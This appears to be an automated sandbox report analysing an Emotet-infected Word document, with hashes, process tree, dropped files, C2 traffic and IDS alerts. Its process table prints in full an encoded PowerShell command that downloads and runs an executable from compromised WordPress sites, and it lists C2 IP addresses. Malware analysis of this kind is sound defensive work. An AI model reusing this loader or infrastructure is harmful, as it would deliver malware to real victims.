analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | a.doc |
| Full analysis: | https://app.any.run/tasks/161bcd33-676a-49fc-bdb1-9b85e7659f10 |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | October 14, 2019, 21:35:43 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Square, Subject: Serbian Dinar, Author: Russ Smitham, Keywords: Orchestrator, Comments: Self-enabling, Template: Normal.dotm, Last Saved By: Estella Wiza, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:00:00 2019, Last Saved Time/Date: Mon Oct 14 15:00:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0 |
| MD5: | A9F2A8CEFF3A5265923EC5D1472D4A07 |
| SHA1: | 252A70B3BCA87B0069B1E718E0B8AE62672D0617 |
| SHA256: | D1B64BB432F11C7FB3381DB7B69F3E5EF807263FC50C26A5DDF51199B032881E |
| SSDEEP: | 3072:6PHuhosKgdzSrGsKyIwLx3+oRaWOcIBOaOhi1o5lE8COrg12bKDmwf9EJZ:6PHuhosKUzSHnLx3+oAWOJQaOhi1wKP |
MALICIOUS
Application was dropped or rewritten from another process
- 472.exe (PID: 736)
- 472.exe (PID: 1792)
- msptermsizes.exe (PID: 3772)
- msptermsizes.exe (PID: 532)
Downloads executable files from the Internet
- powershell.exe (PID: 4088)
Emotet process was detected
- 472.exe (PID: 1792)
EMOTET was detected
- msptermsizes.exe (PID: 3772)
Connects to CnC server
- msptermsizes.exe (PID: 3772)
Changes the autorun value in the registry
- msptermsizes.exe (PID: 3772)
SUSPICIOUS
Executed via WMI
- powershell.exe (PID: 4088)
Executable content was dropped or overwritten
- powershell.exe (PID: 4088)
- 472.exe (PID: 1792)
PowerShell script executed
- powershell.exe (PID: 4088)
Creates files in the user directory
- powershell.exe (PID: 4088)
Connects to server without host name
- msptermsizes.exe (PID: 3772)
Starts itself from another location
- 472.exe (PID: 1792)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 2572)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2572)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | Square |
|---|---|
| Subject: | Serbian Dinar |
| Author: | Russ Smitham |
| Keywords: | Orchestrator |
| Comments: | Self-enabling |
| Template: | Normal.dotm |
| LastModifiedBy: | Estella Wiza |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2019:10:14 14:00:00 |
| ModifyDate: | 2019:10:14 14:00:00 |
| Pages: | 1 |
| Words: | 30 |
| Characters: | 172 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | Reynolds, Murray and Langosh |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 201 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| Manager: | Grady |
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
42
Monitored processes
6
Malicious processes
5
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2572 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\a.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 4088 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhAGUAZgA3ADYANQA1ADEAMwAxADAAZQA0ADMAPQAnAGEAMAB4AGMAYQAxAGMAYQBkAGYAOQA2ADgAMAAyADIAJwA7ACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACAAPQAgACcANAA3ADIAJwA7ACQAYQAwAHgAZABjADQAYwAxADIAYQA3AGUAMwA5ADgAPQAnAGEAMAB4AGUAYQA4ADUAOABhADYAMAA3ADMAZABlADUAMQBkACcAOwAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4AGYAZQA0ADMAMgAwADcANAA5ADIAMwAzADkAMQA9ACcAYQAwAHgAMgA4AGQANwBjADkAYQA2AGQANAAwAGYAJwA7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBuAHQAOwAkAGEAMAB4ADEANQA4ADcAOQAzADQAMAAxAGIAZAAyADQAOAA9ACcAaAB0AHQAcAA6AC8ALwBhAG4AZAByAGUAdwBzAGkAYwBlAGwAbwBmAGYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGMAagAyAGQAMAAwADAAOQAvACoAaAB0AHQAcAA6AC8ALwBiAGUAYQBuAHMAbQBlAGQAaQBhAC4AYwBvAG0ALwB6AGUAdQBzADEANgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHQAdQBiAGEAdwA1AHkAMwA1AC8AKgBoAHQAdABwADoALwAvAGEAYgBoAGkAZABoAGEAbQBtAGEAcwBvAGMAaQBlAHQAeQAuAGMAbwBtAC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwBpAGgAMwB2AHoAZABjADkALwAqAGgAdAB0AHAAOgAvAC8AcABjAGYAMAA4AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAyADQANAA3AC8AKgBoAHQAdABwADoALwAvAGEAYwBxAHUAaQByAGkAbgBnAC0AdABhAGwAZQBuAHQALgBjAG8AbQAvAGQAcABhAGoALwAwADUAZwBkADUANwA1AC8AJwAuACIAcwBwAGAATABpAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADgAOQA5ADAAYQA5AGQANABiAGEAMQAwAGUANwA9ACcAYQAwAHgAZQAxADgAMAAzADgAZgBjADYANQAzAGQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAYQAwAHgAMABmADcAYgA2AGQAZQA3ADUANQAgAGkAbgAgACQAYQAwAHgAMQA1ADgANwA5ADMANAAwADEAYgBkADIANAA4ACkAewB0AHIAeQB7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYALgAiAGQATwB3AE4AbABgAG8AQQBgAGQAYABGAGkAbABlACIAKAAkAGEAMAB4ADAAZgA3AGIANgBkAGUANwA1ADUALAAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkAOwAkAGEAMAB4ADgAMQBkADkAOQBhADgANwBiADEAZAA9ACcAYQAwAHgANgBiAGIAMwAyADAANQBlADcAMwA4ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkALgAiAEwARQBOAGAARwBUAEgAIgAgAC0AZwBlACAAMgAxADMANwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgBUACIAKAAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAApADsAJABhADAAeABjADkANAA1AGYAZQBlAGEAOQBmAD0AJwBhADAAeAA1AGEAYwBmADUAYwBiADYAYQBhACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4ADAAZQA0ADkAZgBlAGYAMwA1ADIAPQAnAGEAMAB4ADkAZABjAGEANQA5AGUAZgA0AGEANAAzADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAZgA5ADUANAA5ADYAYQA4ADEAYwA0ADkANAA9ACcAYQAwAHgANgBkADcAZQAyADgAZQAwAGEAMQA2ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 736 | "C:\Users\admin\472.exe" | C:\Users\admin\472.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
| 1792 | --2525106d | C:\Users\admin\472.exe | 472.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
| 532 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 472.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
| 3772 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Integrity Level: MEDIUM | ||||
Total events
2 274
Read events
1 447
Write events
0
Delete events
0
Modification events
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA88F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 4088 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8ED59U3LYM8KT08X17TG.temp | — | |
MD5:— | SHA256:— | |||
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F01B35F4.wmf | wmf | |
MD5:A0FB75E3B071FD4BBD592C81F67B8FAE | SHA256:AA6E160CE29E4595DF988ECC422F006AB7F7C31A748418C3DAD6A6D3CB1F6412 | |||
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D26C409.wmf | wmf | |
MD5:02E452F1C30E8326E8BD5A3699F1DCD0 | SHA256:7C2F3351C5450F935337AAD6BA4F337E2BA1D12606DC9FAC6C20FD66386A56DA | |||
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89379A28.wmf | wmf | |
MD5:073A20261CE8422D2FA082D14C6FA802 | SHA256:1F67FE23E79A361E6E03B66BF3A9FF7E61A0B32B751928990B6AC891B8F0C74E | |||
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1F48A76.wmf | wmf | |
MD5:DC5A0475A41A3F012DB4D6BA2A0190F8 | SHA256:BE0A6681FCE07F013F1C65590124C63502CDE4F2D4AC481837737C4E4EA85E62 | |||
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:55F95AC040C08387B74CDDD71E142399 | SHA256:4B0DD60C3EF930B04726E19BC8BF7CDEE0D5B13BEFE9D22B507CC9C5FB98AC84 | |||
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D3B422.wmf | wmf | |
MD5:1CAD0EEAC5453D12F0129BBF5A958B8B | SHA256:37DF2856F5B2BABB51E0530948BE132A38D86ECEC69FDD99019EFC812FDD6FA6 | |||
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8B378DCC62035BBABEF8B1C2A131A338 | SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275 | |||
| 2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6E1C0BFF.wmf | wmf | |
MD5:CFB180FF4C12C87A459B2D1DEAC6A577 | SHA256:558D6CBF5C940E55C9901E4DCDADF4F79E8671C08CA4C12E3E0338D3BAD5FF26 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
1
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3772 | msptermsizes.exe | POST | — | 216.98.148.181:8080 | http://216.98.148.181:8080/prov/devices/add/merge/ | US | — | — | malicious |
3772 | msptermsizes.exe | POST | — | 110.36.234.146:80 | http://110.36.234.146/glitch/enabled/add/ | PK | — | — | malicious |
3772 | msptermsizes.exe | POST | — | 191.82.16.60:80 | http://191.82.16.60/schema/ | AR | — | — | malicious |
3772 | msptermsizes.exe | POST | — | 91.83.93.105:8080 | http://91.83.93.105:8080/site/stubs/add/ | HU | — | — | malicious |
4088 | powershell.exe | GET | 200 | 199.204.248.102:80 | http://andrewsiceloff.com/wp-admin/cj2d0009/ | US | executable | 192 Kb | suspicious |
3772 | msptermsizes.exe | POST | 200 | 68.183.190.199:8080 | http://68.183.190.199:8080/window/ | US | binary | 132 b | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4088 | powershell.exe | 199.204.248.102:80 | andrewsiceloff.com | CONTINENTAL BROADBAND PENNSYLVANIA, INC. | US | suspicious |
3772 | msptermsizes.exe | 216.98.148.181:8080 | — | CariNet, Inc. | US | malicious |
3772 | msptermsizes.exe | 191.82.16.60:80 | — | Telefonica de Argentina | AR | malicious |
3772 | msptermsizes.exe | 110.36.234.146:80 | — | National WiMAX/IMS environment | PK | malicious |
3772 | msptermsizes.exe | 91.83.93.105:8080 | — | Invitech Megoldasok Zrt. | HU | malicious |
— | — | 68.183.190.199:8080 | — | DSL Extreme | US | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
andrewsiceloff.com |
| suspicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
4088 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4088 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
4088 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4088 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3772 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 2 |
3772 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3772 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3772 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 23 |
3772 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3772 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
14 ETPRO signatures available at the full report